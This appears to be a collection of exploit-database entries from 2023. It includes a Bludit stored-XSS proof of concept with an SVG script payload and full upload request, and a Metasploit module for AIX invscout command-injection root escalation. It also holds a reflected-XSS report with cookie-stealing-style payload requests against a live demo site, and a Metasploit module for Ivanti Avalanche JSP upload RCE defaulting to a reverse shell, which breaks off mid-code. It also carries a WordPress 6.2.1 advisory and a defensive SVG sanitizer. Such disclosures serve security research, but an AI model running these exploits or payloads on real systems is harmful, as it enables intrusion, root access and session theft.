<pre><code># Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 2023-04-15<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage: https://www.bludit.com/<br /># Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1<br /># Version: 3.14.1<br /># Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53<br /># CVE: CVE-2023-31698<br /><br />SVG Payload<br />-------------<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /><script type="text/javascript"><br />alert(document.domain);<br /></script><br /></svg><br /><br />Save this SVG file as xss.svg.<br /><br />Steps to Reproduce:<br /><br />1. First, log in to the admin panel.<br />2. Then go to Settings and open the Logo section.<br />3. 
Now upload the xss.svg file; the request data will look like this:<br /><br />POST /bludit/admin/ajax/logo-upload HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0<br />Content-Type: multipart/form-data; boundary=---------------------------15560729415644048492005010998<br />Referer: http://127.0.0.1/bludit/admin/settings<br />Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i<br />Content-Length: 651<br /><br />-----------------------------15560729415644048492005010998<br />Content-Disposition: form-data; name="tokenCSRF"<br /><br />626c201693546f472cdfc11bed0938aab8c6e480<br />-----------------------------15560729415644048492005010998<br />Content-Disposition: form-data; name="inputFile"; filename="xss.svg"<br />Content-Type: image/svg+xml<br /><br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><br /><script type="text/javascript"><br />alert(document.domain);<br /></script><br /></svg><br /><br />-----------------------------15560729415644048492005010998--<br /><br />4. Now open the link of the logo image you uploaded. The XSS pop-up appears.<br /></code></pre>
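The root cause above is that the logo upload accepts an SVG containing a `script` element and the file is later served inline as `image/svg+xml`, so the browser executes it in the site's origin. The following is an added defensive example, not code from the Bludit project or the advisory: it parses an uploaded SVG with Python's standard library and rejects documents that carry active content (script or foreignObject elements, `on*` event-handler attributes, or `javascript:`/`data:` hrefs). The function names `scan_svg` and `is_safe_svg` and the sample documents are constructed for this example.

```python
"""Reject SVG uploads that carry active content (added example, hypothetical names).

xml.etree is used here for portability; a production upload handler should parse
with a hardened parser such as defusedxml, which also blocks entity expansion.
"""
import xml.etree.ElementTree as ET

# Elements that execute or embed active content when an SVG is rendered as a document.
UNSAFE_ELEMENTS = {"script", "foreignObject"}
# URL schemes that must never appear in href-like attributes of user-supplied SVG.
UNSAFE_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local(tag: str) -> str:
    """Strip the namespace from an ElementTree name ('{ns}script' -> 'script')."""
    return tag.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> list:
    """Return a list of findings; an empty list means no active content was found.

    Raises ValueError when the input is not well-formed XML or its root is not <svg>.
    """
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        raise ValueError(f"not well-formed XML: {exc}") from exc
    if _local(root.tag) != "svg":
        raise ValueError(f"root element is <{_local(root.tag)}>, expected <svg>")

    findings = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in UNSAFE_ELEMENTS:
            findings.append(f"element <{name}>")
        for attr, value in elem.attrib.items():
            attr_name = _local(attr)  # covers both href and xlink:href
            if attr_name.lower().startswith("on"):
                findings.append(f"event handler {attr_name} on <{name}>")
            elif attr_name == "href" and value.strip().lower().startswith(UNSAFE_SCHEMES):
                findings.append(f"unsafe href on <{name}>")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """True only when the document parses as SVG and has no findings."""
    try:
        return not scan_svg(data)
    except ValueError:
        return False


# Constructed samples: the first mirrors the shape of the advisory's proof of concept,
# the second is a benign icon, the third uses an event-handler attribute instead of <script>.
SCRIPT_SVG = b"""<?xml version="1.0" standalone="no"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <polygon points="0,0 0,50 50,0" fill="#009900"/>
  <script type="text/javascript">alert(document.domain);</script>
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50">
  <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
</svg>"""

HANDLER_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1" onload="alert(1)"/></svg>"""

if __name__ == "__main__":
    for label, doc in (("script", SCRIPT_SVG), ("benign", BENIGN_SVG), ("handler", HANDLER_SVG)):
        print(label, "->", "accept" if is_safe_svg(doc) else f"reject {scan_svg(doc)}")
```

Rejecting at upload time is the primary control; as defence in depth, serve user-supplied files from a separate origin or with `Content-Disposition: attachment`, which stops an SVG from running script in the application's origin even if one slips through.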
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> include Msf::Post::File<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'invscout RPM Privilege Escalation',<br /> 'Description' => %q{<br /> This module exploits a command injection vulnerability in IBM AIX<br /> invscout set-uid root utility present in AIX 7.2 and earlier.<br /><br /> The undocumented -rpm argument can be used to install an RPM file;<br /> and the undocumented -o argument passes arguments to the rpm utility<br /> without validation, leading to command injection with effective-uid<br /> root privileges.<br /><br /> This module has been tested successfully on AIX 7.2.<br /> },<br /> 'Author' => [<br /> 'Tim Brown', # Discovery and PoC<br /> 'bcoles' # Metasploit<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-28528'],<br /> ['URL', 'https://talosintelligence.com/vulnerability_reports/TALOS-2023-1691'],<br /> ],<br /> 'Platform' => %w[unix aix],<br /> 'Arch' => ARCH_CMD,<br /> 'Payload' => {<br /> 'BadChars' => "\x00\x0a\x0d\x22",<br /> 'Compat' => {<br /> 'PayloadType' => 'cmd',<br /> 'RequiredCmd' => 'generic telnet openssl'<br /> }<br /> },<br /> 'DefaultOptions' => {<br /> 'PrependSetresuid' => true,<br /> 'PrependSetresgid' => true,<br /> 'PrependFork' => true<br /> },<br /> 'SessionTypes' => %w[shell meterpreter],<br /> 'Targets' => [['Automatic', {}]],<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2023-04-24',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('INVSCOUT_PATH', [true, 'Path to invscout executable', 
'/usr/sbin/invscout'])<br /> ])<br /> end<br /><br /> def invscout_path<br /> datastore['INVSCOUT_PATH']<br /> end<br /><br /> def check<br /> return CheckCode::Safe("#{invscout_path} is not executable") unless executable?(invscout_path)<br /><br /> res = execute_command('id')<br /> id = res.to_s.scan(/^(.*?uid=.*?)$/).flatten.first.to_s<br /><br /> return CheckCode::Safe("#{invscout_path} is not vulnerable.") unless id.include?('euid=0')<br /><br /> CheckCode::Vulnerable("Output: #{id}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> rpm_path = "#{Rex::Text.rand_text_alphanumeric(8..12)}.rpm"<br /> rpm_args = "; #{cmd}; echo "<br /> res = cmd_exec("#{invscout_path} -RPM #{rpm_path} -o \"#{rpm_args}\"")<br /> vprint_line(res) unless res.blank?<br /> res<br /> end<br /><br /> def exploit<br /> execute_command(payload.encoded)<br /> end<br />end<br /></code></pre>
<pre><code>On May 16, 2023, the WordPress core team released WordPress 6.2.1, which contains patches for 5 vulnerabilities, including a Medium Severity Directory Traversal vulnerability, a Medium-Severity Cross-Site Scripting vulnerability, and several lower-severity vulnerabilities.<br /><br />These patches have been backported to every version of WordPress since 4.1. WordPress has supported automatic core updates for security releases since WordPress 3.7, and the vast majority of WordPress sites should receive a patch for their major version of WordPress automatically over the next 24 hours. We recommend verifying that your site has been automatically updated to one of the patched versions. Patched versions are available for every major version of WordPress since 4.1, so you can update without risking compatibility issues.<br /><br />If your site has not been updated automatically we strongly recommend updating manually as soon as possible, as one of the vulnerabilities patched in this release can be used by an attacker with a low-privileged contributor-level account to take over a site.<br /><br />This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. 
Or you can read the full post in this email.<br /><br />Vulnerability Analysis<br /><br />As with every WordPress core release containing security fixes, the Wordfence Threat Intelligence team analyzed the code changes in detail to evaluate the impact of these vulnerabilities on our customers, and to ensure our customers remain protected.<br /><br />Description: WordPress Core <= 6.2 - Directory Traversal via wp_lang <br /><br />Affected Versions: WordPress Core < 6.2.1<br /><br />Researcher: Matt Rusnak, reported by Ramuel Gall as well as an undisclosed third party auditor<br /><br />CVE ID: CVE-2023-2745 <br /><br />CVSS Score: 5.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N<br /><br />Fully Patched Version: 6.2.1<br /><br />WordPress Core is vulnerable to Directory Traversal in versions up to, and including, 6.2, via the ‘wp_lang’ parameter. This allows unauthenticated attackers to access and load arbitrary translation files. In cases where an attacker is able to upload a crafted translation file onto the site, such as via an upload form, this could be also used to perform a Cross-Site Scripting attack. This vulnerability would not be easy to exploit in an impactful manner on most configurations.<br /><br />Description: WordPress Core <= 6.2 - Cross-Site Request Forgery via wp_ajax_set_attachment_thumbnail <br /><br />Affected Versions: WordPress Core < 6.2.1<br /><br />Researcher: John Blackbourn of the WordPress security team<br /><br />CVE ID: Pending<br /><br />CVSS Score: 4.3 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N<br /><br />Fully Patched Version: 6.2.1<br /><br />WordPress Core is vulnerable to Cross-Site Request Forgery due to missing nonce validation on the ‘wp_ajax_set_attachment_thumbnail’ AJAX function in versions up to, and including, 6.2. 
This allows unauthenticated users to update the thumbnail image associated with existing attachments, granted they can trick an authenticated user with appropriate permissions into performing an action, such as clicking a link. The impact of this vulnerability is incredibly minimal and we do not expect to see any exploitation of this weakness.<br /><br />Description: WordPress Core <= 6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Embed Discovery Functionality <br /><br />Affected Versions: WordPress Core < 6.2.1<br /><br />Researcher: Jakub Żoczek of Securitum and undisclosed third-party auditor<br /><br />CVE ID: Pending<br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Fully Patched Version: 6.2.1<br /><br />WordPress Core is vulnerable to stored Cross-Site Scripting in versions up to, and including, 6.2, due to insufficient validation of the protocol in the response when processing oEmbed discovery. This makes it possible for authenticated attackers with contributor-level and above permissions to use a crafted oEmbed payload at a remote URL to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Description: WordPress Core <= 6.2 - Insufficient Sanitization of Block Attributes <br /><br />Affected Versions: WordPress Core < 6.2.1<br /><br />Researcher: Undisclosed third-party auditor<br /><br />CVE ID: Pending<br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Fully Patched Version: 6.2.1<br /><br />WordPress Core fails to sufficiently sanitize block attributes in versions up to, and including, 6.2. This makes it possible for authenticated attackers with contributor-level and above permissions to embed arbitrary content in HTML comments on the page, though Cross-Site scripting may be possible when combined with an additional vulnerability. 
Please note that this would only affect sites utilizing a block editor compatible theme.<br /><br />Description: WordPress Core <= 6.2 - Shortcode Execution in User Generated Content <br /><br />Affected Versions: WordPress Core < 6.2.1<br /><br />Researcher: Liam Gladdy of WP Engine<br /><br />CVE ID: Pending<br /><br />CVSS Score: 6.5 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N<br /><br />Fully Patched Version: 6.2.1<br /><br />WordPress Core processes shortcodes in user-generated content on block themes in versions up to, and including, 6.2. This could allow unauthenticated attackers to execute shortcodes via submitting comments or other content, allowing them to exploit vulnerabilities that typically require Subscriber or Contributor-level permissions. While this is likely to have minimal impact on its own, it can significantly increase the severity and exploitability of other vulnerabilities.<br /><br />Conclusion<br /><br />In today’s article, we covered five vulnerabilities patched in the WordPress 6.2.1 Security and Maintenance Release. Most actively used WordPress sites should be patched via automatic updates within the next 24 hours.<br /><br />The Wordfence firewall’s built-in directory traversal protection should block attempts to exploit the directory traversal vulnerability, and it would typically only be impactful when exploited by a skilled attacker in certain configurations. 
Most of the other issues fixed today are similar in that they require specific configurations or circumstances, such as other vulnerable plugins, to be exploited with real impact.<br /><br />However, we urge all site owners to verify that WordPress is updated as soon as possible since it is not practical to deploy a firewall rule that protects against the oEmbed issue and as such any site with untrusted contributor-level users may be at risk.<br /><br />As always, we strongly recommend updating your site to a patched version of WordPress if it hasn’t been updated automatically. As long as you are running a version of WordPress greater than 4.1, an update is available to patch these vulnerabilities while keeping you on the same major version, so you will not need to worry about compatibility issues.<br /><br />Special thanks to Wordfence QA Lead Matt Rusnak for finding the directory traversal vulnerability that we responsibly disclosed, and to John Blackbourn of the WordPress security team, Jakub Żoczek of Securitum, and Liam Gladdy of WP Engine for responsibly disclosing these issues.<br /><br /></code></pre>
<pre><code>## Title: SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database-1.0-2023 XSS-Reflected Vulnerability<br />## Author: nu11secur1ty<br />## Date: 05.17.2023<br />## Vendor: https://technosmarter.com/<br />## Software: https://github.com/technosmarter/SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database<br />## Reference XSS: https://portswigger.net/web-security/cross-site-scripting<br /><br /><br />## Description:<br />The value of the keywords request parameter is copied into the HTML<br />document as text between TITLE tags.<br />The payload wi46u</title><script>alert(1)</script>fssgc was submitted<br />in the keywords parameter. This input was echoed unmodified in the<br />application's response.<br />Conclusion: The `search` parameter is vulnerable to reflected XSS<br />with JavaScript injection.<br />A malicious user can craft a malicious URL and then send it<br />to a very large group of people. This is a very dangerous vulnerability.<br /><br /><br /><br />STATUS: CRITICAL Vulnerability<br /><br />[+]Exploit-XSS-test:<br />```XSS<br />POST /blog/search/%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/2<br />Host: demo.technosmarter.com<br />Cookie: PHPSESSID=c116aa1138f1c4a490514e8bad58eef4<br />Content-Length: 73<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://demo.technosmarter.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: 
https://demo.technosmarter.com/blog/search/%3Cscript%3Ealert(document.cookie)%3C/script%3E<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br /><br />keywords=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&subsearch=<br />```<br />[+]Response:<br />```HTTP<br />HTTP/2 302 Found<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-cache, no-store, must-revalidate, max-age=0<br />Pragma: no-cache<br />Location: https://demo.technosmarter.com/blog/search/<script>alert(document.cookie)</script><br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 18035<br />Vary: Accept-Encoding<br />Date: Wed, 17 May 2023 10:42:45 GMT<br />Server: LiteSpeed<br />Strict-Transport-Security: max-age=31536000; includeSubDomains; preload<br />X-Xss-Protection: 1; mode=block<br />X-Content-Type-Options: nosniff<br />Alt-Svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"<br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/technosmarter/2023/SEO-friendly-blog-CMS-system-in-PHP-with-MYSQL-database-1.0-2023)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/05/seo-friendly-blog-cms-10-2023-xss.html)<br /><br />## Time spent:<br />00:37:00<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Ivanti Avalanche FileStoreConfig File Upload',<br /> 'Description' => %q{<br /> Ivanti Avalanche prior to v6.4.0.186 permits MS-DOS style short<br /> names in the configuration path for the Central FileStore. Because of<br /> this, an administrator can change the default path to the web root<br /> of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Piotr Bazydlo', # @chudypb - Vulnerability Discovery<br /> 'Shelby Pace' # Metasploit module<br /> ],<br /> 'References' => [<br /> ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-456/'],<br /> ['URL', 'https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US'],<br /> ['URL', 'https://attackerkb.com/topics/jcdcN9SN9V/cve-2023-28128'],<br /> ['CVE', '2023-28128']<br /> ],<br /> 'Platform' => ['win', 'java'],<br /> 'Privileged' => true,<br /> 'Arch' => ARCH_JAVA,<br /> 'Targets' => [<br /> [ 'Automatic Target', { 'DefaultOptions' => { 'Payload' => 'java/jsp_shell_reverse_tcp' } }]<br /> ],<br /> 'DisclosureDate' => '2023-04-24',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'Reliability' => [ REPEATABLE_SESSION ],<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8080),<br /> OptString.new('USERNAME', [ true, 
'User name to log in with', 'amcadmin' ]),<br /> OptString.new('PASSWORD', [ true, 'Password to log in with', 'admin' ]),<br /> OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/AvalancheWeb' ])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> # Cleanup should not be needed after doing just a check.<br /> @cleanup_needed = false<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'login.jsf'),<br /> 'method' => 'GET'<br /> )<br /><br /> return CheckCode::Unknown('Failed to receive a response from the application') unless res<br /><br /> unless res.body.include?('Avalanche - User Login')<br /> return CheckCode::Safe('Application does not appear to be Ivanti Avalanche')<br /> end<br /><br /> html = res.get_html_document<br /> elem = html.search('link')&.find { |link| link&.at('@href')&.text&.match(/\d+\.\d+\.\d+\.\d{1,4}/) }<br /> return CheckCode::Detected('Couldn\'t retrieve element containing Avalanche version') unless elem<br /><br /> version = elem&.at('@href')&.value&.match(/(\d+\.\d+\.\d+\.\d{1,4})/)<br /> return CheckCode::Detected('Failed to retrieve software version') unless version && version.length >= 2<br /><br /> version = version[1]<br /> vprint_status("Version of Ivanti Avalanche appears to be v#{version}")<br /> ver_no = Rex::Version.new(version)<br /> patched_version = Rex::Version.new('6.4.0.186')<br /><br /> if ver_no >= patched_version<br /> CheckCode::Safe('Target has been patched!')<br /> elsif ver_no < patched_version<br /> CheckCode::Appears('Target appears to be running an unpatched version of Ivanti Avalanche!')<br /> else<br /> CheckCode::Unknown("This should never be hit! Some error occurred when grabbing the target version: #{ver_no}")<br /> end<br /> end<br /><br /> def authenticate<br /> if datastore['USERNAME'].blank? 
&& datastore['PASSWORD'].blank?<br /> fail_with(Failure::BadConfig, 'Please set the USERNAME and PASSWORD options')<br /> end<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'login.jsf'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to access login page') unless res&.body&.include?('Avalanche - User Login')<br /><br /> html = res.get_html_document<br /> view_state = get_view_state(html)<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after browsing to the login page.') unless view_state<br /><br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'login.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'loginForm' => 'loginForm',<br /> 'j_idt8' => '',<br /> 'loginField' => datastore['USERNAME'],<br /> 'passwordField' => datastore['PASSWORD'],<br /> 'TextCaptchaAnswer' => '',<br /> 'javax.faces.ViewState' => view_state,<br /> 'loginTableButton' => 'loginTableButton'<br /> }<br /> )<br /><br /> unless res&.code == 302 && res&.headers&.dig('Location')&.include?('inventory.jsf')<br /> fail_with(Failure::UnexpectedReply, 'Login failed')<br /> end<br /> end<br /><br /> def get_view_state(html)<br /> view_state = html.xpath("//input[@name='javax.faces.ViewState']")&.first&.at('@value')&.text<br /><br /> view_state<br /> end<br /><br /> def configure_filestore<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /><br /> unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first<br /> fail_with(Failure::UnexpectedReply, 'Failed to access FileStore configuration')<br /> end<br /><br /> html = res.get_html_document<br /> view_state = get_view_state(html)<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state from 
FileStoreConfig page') unless view_state<br /><br /> @original_config_path = html.xpath("//input[@id='txtUncPath']")&.first&.at('@value')&.text<br /> fail_with(Failure::UnexpectedReply, 'Unable to grab FileStore path') unless @original_config_path<br /> print_status("Original FileStore config path: '#{@original_config_path}'")<br /><br /> # determine drive letter<br /> drive_letter = @original_config_path.match(/([a-zA-Z])(:|\$)/)<br /> fail_with(Failure::UnexpectedReply, 'Couldn\'t determine drive letter for path') unless drive_letter&.length&.>= 3<br /> drive_letter = drive_letter[1]<br /><br /> new_config_path = "#{drive_letter}:\\PROGRA~1\\Wavelink\\AVALAN~1\\Web"<br /> print_status("Changing FileStore config path to '#{new_config_path}'")<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'linkFileStoreConfigSave' => 'linkFileStoreConfigSave',<br /> 'formFileStoreConfig' => 'formFileStoreConfig',<br /> 'txtUncPath' => new_config_path,<br /> 'txtVelocityFolder' => '',<br /> 'javax.faces.ViewState' => view_state<br /> }<br /> )<br /><br /> input_field_html = res&.get_html_document&.xpath('//input[@id="txtUncPath"]')&.first<br /> if input_field_html.blank?<br /> fail_with(Failure::UnexpectedReply, 'Did not receive a response containing the expected txtUncPath input field!')<br /> elsif input_field_html[:value] != new_config_path<br /> fail_with(Failure::UnexpectedReply, 'Failed to change FileStore config path')<br /> end<br /> end<br /><br /> def get_directory_val(res, dir_name)<br /> html = res.get_html_document<br /> results = html.xpath('//tr[contains(@class, "DIRECTORY")]')<br /> fail_with(Failure::UnexpectedReply, 'Failed to find list of expected directories') unless results<br /><br /> expand_dir = results.find { |result| result.at('td')&.text&.strip == dir_name }<br /> fail_with(Failure::UnexpectedReply, "Failed to 
find the '#{dir_name}' directory to write to") unless expand_dir<br /> data_rk = expand_dir.at('@data-rk')&.value<br /> fail_with(Failure::UnexpectedReply, "Failed to get value to expand #{dir_name} directory") unless data_rk<br /><br /> data_rk<br /> end<br /><br /> def expand_folder(data_rk, view_state)<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',<br /> 'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',<br /> 'fileStoreTree_dlgFileStoreTree' => 'fileStoreTree_dlgFileStoreTree',<br /> 'fileStoreTree_dlgFileStoreTree_expand' => data_rk,<br /> 'javax.faces.ViewState' => view_state<br /> }<br /> )<br /> end<br /><br /> def select_folder(data_rk, view_state)<br /> @cleanup_needed = true<br /> send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' =><br /> {<br /> 'javax.faces.source' => 'fileStoreTree_dlgFileStoreTree',<br /> 'javax.faces.partial.execute' => 'fileStoreTree_dlgFileStoreTree',<br /> 'javax.faces.behavior.event' => 'select',<br /> 'javax.faces.partial.event' => 'select',<br /> 'fileStoreTree_dlgFileStoreTree_instantSelection' => data_rk,<br /> 'form_filestore_tree' => 'form_filestore_tree',<br /> 'fileStoreTree_dlgFileStoreTree_selection' => data_rk,<br /> 'javax.faces.ViewState' => view_state<br /> }<br /> )<br /> end<br /><br /> def upload_payload<br /> payload_name = "#{Rex::Text.rand_text_alpha(5..12)}.jsp"<br /> # need to 'select' webapps/AvalancheWeb to upload a file<br /> res = send_request_cgi(<br /> 'uri' => normalize_uri(target_uri.path, 'app', 'FileStoreConfig.jsf'),<br /> 'method' => 'GET',<br /> 'keep_cookies' => true<br /> )<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to access updated FileStore page') 
unless res&.get_html_document&.xpath('//form[@id="form_filestore_tree"]')&.first<br /> web_data_rk = get_directory_val(res, 'webapps')<br /> view_state = get_view_state(res.get_html_document)<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after accessing the updated FileStore page') unless view_state<br /><br /> res = expand_folder(web_data_rk, view_state)<br /> fail_with(Failure::UnexpectedReply, 'Did not receive response from \'webapps\' expansion') unless res<br /> avalanche_data_rk = get_directory_val(res, 'AvalancheWeb')<br /> view_state = get_view_state(res.get_html_document)<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after getting the directory value for AvalancheWeb') unless view_state<br /> res = select_folder(avalanche_data_rk, view_state)<br /> fail_with(Failure::UnexpectedReply, 'Did not receive response from \'AvalancheWeb\' selection') unless res<br /><br /> view_state = get_view_state(res.get_html_document)<br /> fail_with(Failure::UnexpectedReply, 'Failed to retrieve view state after selecting the AvalancheWeb folder') unless view_state<br /><br /> boundary = "#{'-' * 4}WebKitFormBoundary#{Rex::Text.rand_text_alphanumeric(16)}"<br /><br /> post_data = "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"upload-form\"\r\n\r\n"<br /> post_data << "upload-form\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"javax.faces.ViewState\"\r\n\r\n"<br /> post_data << "#{view_state}\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.ajax\r\n\r\n"<br /> post_data << "true\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: form-data; name=\"javax.faces.partial.execute\"\r\n\r\n"<br /> post_data << "importFileStoreItemPanel_dlgFileStoreTree\r\n"<br /> post_data << "--#{boundary}\r\n"<br /> post_data << "Content-Disposition: 
